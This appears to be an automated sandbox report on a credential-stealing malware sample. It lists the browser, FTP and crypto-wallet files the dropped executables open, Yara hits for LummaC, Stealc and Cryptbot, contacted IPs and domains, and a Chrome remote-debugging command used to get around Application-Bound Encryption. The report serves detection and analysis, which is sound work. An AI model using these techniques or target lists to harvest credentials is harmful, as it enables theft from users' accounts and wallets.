Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\ProgramData\SiteDesigner\3D-FTP
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Binance Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Searches for user specific document files
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008757001\r5mqFEC.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Directory queried: C:\Users\user\Documents\MXPXCVPDVN
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\AppData\Local\Temp\1008763001\e5e907fecb.exe Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Yara detected Credential Stealer
Source: Yara match File source: 0000000A.00000003.2558891081.00000000032B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2525316848.00000000032B2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2562004467.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2826165474.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: r5mqFEC.exe PID: 7580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: a7f098a093.exe PID: 6104, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 8144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e5e907fecb.exe PID: 5012, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1008764001\3996dc7402.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Yara detected Credential Flusher
Source: Yara match File source: 00000029.00000003.2996946073.000000000124F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.2864753465.000000000150F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d986826e57.exe PID: 6612, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d986826e57.exe PID: 4556, type: MEMORYSTR
Yara detected Cryptbot
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000C.00000003.3257614525.00000000012E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: a7f098a093.exe PID: 6104, type: MEMORYSTR
Yara detected LummaC Stealer
Source: Yara match File source: Process Memory Space: r5mqFEC.exe PID: 7580, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: e5e907fecb.exe PID: 5012, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Yara detected Stealc
Source: Yara match File source: 0000000E.00000002.3218633907.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000003.2718635332.0000000004E60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.3207489291.0000000000481000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.2853261373.0000000004E80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3320048411.000000000117B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3310520507.0000000000481000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 8144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 3996dc7402.exe PID: 4936, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1561857 Sample: file.exe Startdate: 24/11/2024 Architecture: WINDOWS Score: 100 90 push-hook.cyou 2->90 92 www.google.com 2->92 94 11 other IPs or domains 2->94 126 Suricata IDS alerts for network traffic 2->126 128 Found malware configuration 2->128 130 Antivirus detection for URL or domain 2->130 132 17 other signatures 2->132 9 skotes.exe 8 40 2->9         started        14 file.exe 5 2->14         started        16 e5e907fecb.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 dnsIp5 108 185.215.113.43, 49748, 49759, 49774 WHOLESALECONNECTIONSNL Portugal 9->108 110 185.215.113.16, 49815, 49838, 80 WHOLESALECONNECTIONSNL Portugal 9->110 112 31.41.244.11, 49760, 49778, 80 AEROEXPRESS-ASRU Russian Federation 9->112 74 C:\Users\user\AppData\...\19cf1f0449.exe, PE32 9->74 dropped 76 C:\Users\user\AppData\...\d986826e57.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\...\3996dc7402.exe, PE32 9->78 dropped 84 9 other malicious files 9->84 dropped 160 Creates multiple autostart registry keys 9->160 162 Hides threads from debuggers 9->162 164 Tries to detect sandboxes / dynamic malware analysis system (registry check) 9->164 20 19cf1f0449.exe 9->20         started        23 3996dc7402.exe 9->23         started        26 a7f098a093.exe 5 2 9->26         started        37 3 other processes 9->37 80 C:\Users\user\AppData\Local\...\skotes.exe, PE32 14->80 dropped 82 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 14->82 dropped 166 Detected unpacking (changes PE section rights) 14->166 168 Tries to evade debugger and weak emulator (self modifying code) 14->168 170 Tries to detect virtualization through RDTSC time measurements 14->170 29 skotes.exe 14->29         started        172 Query firmware table information (likely to detect VMs) 16->172 174 Found many strings related to Crypto-Wallets (likely being stolen) 16->174 176 Tries to harvest and steal ftp login credentials 16->176 182 2 other signatures 16->182 178 Binary is likely a compiled AutoIt script file 18->178 180 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 18->180 31 firefox.exe 18->31         started        33 taskkill.exe 18->33         started        35 taskkill.exe 18->35         started        39 4 other processes 18->39 file6 signatures7 process8 dnsIp9 134 Multi AV Scanner detection for dropped file 20->134 136 Detected unpacking (changes PE section rights) 20->136 138 Tries to detect sandboxes and other dynamic analysis tools (window names) 20->138 154 4 other signatures 20->154 96 185.215.113.206, 49855, 80 WHOLESALECONNECTIONSNL Portugal 23->96 140 Antivirus detection for dropped file 23->140 142 Attempt to bypass Chrome Application-Bound Encryption 23->142 144 Machine Learning detection for dropped file 23->144 41 chrome.exe 23->41         started        44 WerFault.exe 23->44         started        98 fvtekk5pn.top 34.116.198.130, 49808, 80 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 26->98 100 